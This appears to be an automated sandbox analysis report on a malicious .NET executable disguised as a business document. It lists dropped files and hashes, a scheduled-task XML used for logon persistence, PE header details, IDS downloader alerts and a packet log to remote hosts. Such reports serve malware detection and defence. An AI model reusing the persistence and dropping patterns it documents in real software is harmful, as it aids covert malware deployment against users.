C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt3cnewh.wog.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lobd44dl.mhw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmlenjg4.p34.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxkjhyeq.kuf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp8289.tmp

Download File

Process:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.116157947312451
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTCv:He7XQBBYrFdOFzOz6dKrsuk
MD5:	B09A6D8A7C22A3EE3A5D1D75172BD035
SHA1:	FC476E7AB2138BB0B2F9EFF20532817D50E7736C
SHA-256:	87F429225CF6D533697E5C11482795E5C4D42F61B0675B4B65544FB21D67EFF2
SHA-512:	668C97AB751FCB76199FC5AA48720295A70287772C3CA7E83606253A9D2E4DD9E8EAB74EC27227F3C1E39145B1536976FA457AD463F67C1498A9466800FA1B54
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmp9536.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1572
Entropy (8bit):	5.116157947312451
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTCv:He7XQBBYrFdOFzOz6dKrsuk
MD5:	B09A6D8A7C22A3EE3A5D1D75172BD035
SHA1:	FC476E7AB2138BB0B2F9EFF20532817D50E7736C
SHA-256:	87F429225CF6D533697E5C11482795E5C4D42F61B0675B4B65544FB21D67EFF2
SHA-512:	668C97AB751FCB76199FC5AA48720295A70287772C3CA7E83606253A9D2E4DD9E8EAB74EC27227F3C1E39145B1536976FA457AD463F67C1498A9466800FA1B54
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Download File

Process:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	792576
Entropy (8bit):	7.917312194082446
Encrypted:	false
SSDEEP:	24576:YbioMtmDUIKVQ2UNdpZRRMDdK/1Apztv:YMt+F2Q/jCMoztv
MD5:	B2FCDE172F7605E8A4AF7B60349418D7
SHA1:	7279C465E2EA6CED62C742C679DB21EC9A9A4514
SHA-256:	8FCC14A7D1F657FD1CF84282AD1D81404E7CCC253E9AD8F36CCD9118A674D6CC
SHA-512:	8B40661958D8D0FCD170B3D61492A8FC3FBBAEFADEB2296D42500CF24935CCE6E44575293E2210DECFF4CCD5212821270DC3DFE788F4C8BDEBF36FADBCE0A0E5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................... ........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......(...hw......J....................................................0..A....... .........%.h...(.....i... .........%....(.........(.........&......j}.....s....}......}....+..(.......(.........0..........~i.....~.......$....E4.......k....... ...........3...................0.......................0...;...............N.......f...........U...T...T.......................9...........h...........J......x...s...o...#.......{..................j}.....{....o........,....&. S..

C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.917312194082446
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Autofill Manufacturing Sdn Bhd 28-08-2024.exe
File size:	792'576 bytes
MD5:	b2fcde172f7605e8a4af7b60349418d7
SHA1:	7279c465e2ea6ced62c742c679db21ec9a9a4514
SHA256:	8fcc14a7d1f657fd1cf84282ad1d81404e7ccc253e9ad8f36ccd9118a674d6cc
SHA512:	8b40661958d8d0fcd170b3d61492a8fc3fbbaefadeb2296d42500cf24935cce6e44575293e2210decff4ccd5212821270dc3dfe788f4c8bdebf36fadbce0a0e5
SSDEEP:	24576:YbioMtmDUIKVQ2UNdpZRRMDdK/1Apztv:YMt+F2Q/jCMoztv
TLSH:	70F42309B9B6BF63DFFD93B0211210180379A866A351F7E32FC1E0E79D26B805A45E57
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.f..................... ........... ........@.. .......................`............@................................

File Icon


Icon Hash:	ecf092ceccd0c4c4

Static PE Info

General

Entrypoint:	0x4c14de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CE6D1E [Wed Aug 28 00:19:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc1490	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x1e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbf4e4	0xbf600	aab3334edf5b631dddcb60508528c609	False	0.9422431213259308	data	7.924386208696683	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x1e00	0x1e00	5881f4bd6215b6567cd361877343c2ac	False	0.8223958333333333	data	7.255452302223029	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc4000	0xc	0x200	d7887a811bc28b9ce92a9500b62a9fd9	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc2100	0x17f9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9074466351637608
RT_GROUP_ICON	0xc390c	0x14	data	1.05
RT_VERSION	0xc3930	0x2b2	data	0.4492753623188406
RT_MANIFEST	0xc3bf4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T12:16:25.120780+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49711	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:22.828528+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49711	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:28.698912+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49723	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:18.292635+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49706	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:27.215975+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49721	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:24.148322+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49715	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:29.337371+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49725	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:29.465790+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49726	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:24.261401+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49711	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:25.685896+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49718	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:21.455030+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49712	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:18.741649+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49710	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:26.386413+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49719	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:16.777161+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49706	80	192.168.2.10	193.122.6.168
2024-08-29T12:16:30.721477+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49730	443	192.168.2.10	188.114.97.3
2024-08-29T12:16:27.195934+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49720	443	192.168.2.10	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:16:15.266568899 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:15.271866083 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:15.271975994 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:15.272239923 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:15.279627085 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:16.159588099 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:16.165649891 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:16.170646906 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:16.679012060 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:16.758641005 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:16.758678913 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:16.758972883 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:16.768644094 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:16.768662930 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:16.777160883 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:17.235970020 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.236078978 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:17.254838943 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:17.254854918 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.255202055 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.349518061 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:17.396496058 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.456310987 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.456399918 CEST	443	49707	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:17.456451893 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:17.464349031 CEST	49707	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:17.495058060 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:17.500022888 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.118598938 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.130043983 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.130079985 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.130179882 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.130722046 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.130733967 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.292634964 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.555201054 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.560113907 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.560194969 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.560513020 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.565953016 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.597356081 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.599551916 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.599565983 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.741673946 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.741770029 CEST	443	49710	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:18.741986990 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.742607117 CEST	49710	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:18.746148109 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.747258902 CEST	49712	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.751138926 CEST	80	49706	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.751488924 CEST	49706	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.752116919 CEST	80	49712	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:18.752202988 CEST	49712	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.752340078 CEST	49712	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:18.757114887 CEST	80	49712	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:20.466684103 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:20.489833117 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:20.494718075 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:21.342185974 CEST	80	49712	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:21.343621969 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.343662024 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.343763113 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.344095945 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.344109058 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.455029964 CEST	49712	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:21.809735060 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.812369108 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.812397003 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.959438086 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.959541082 CEST	443	49713	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:21.959649086 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.963124037 CEST	49713	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:21.969472885 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:21.974334955 CEST	80	49714	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:21.974489927 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:21.974529982 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:21.982808113 CEST	80	49714	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:22.815336943 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:22.828527927 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:22.833477974 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:23.376174927 CEST	80	49714	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:23.417648077 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:23.436614037 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:23.436657906 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:23.438656092 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:23.552270889 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:23.552297115 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.010478973 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.012644053 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.012664080 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.148344994 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.148442030 CEST	443	49715	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.148499966 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.149086952 CEST	49715	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.153162003 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.154289007 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.158425093 CEST	80	49714	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:24.158484936 CEST	49714	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.159303904 CEST	80	49716	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:24.159405947 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.159569025 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.164336920 CEST	80	49716	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:24.217804909 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:24.259375095 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.259417057 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.259481907 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.261400938 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.265070915 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.265084028 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.724915028 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.724994898 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.726521969 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.726532936 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.726809978 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.777026892 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.782318115 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.828497887 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.887693882 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.887792110 CEST	443	49717	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:24.887840986 CEST	49717	443	192.168.2.10	188.114.97.3
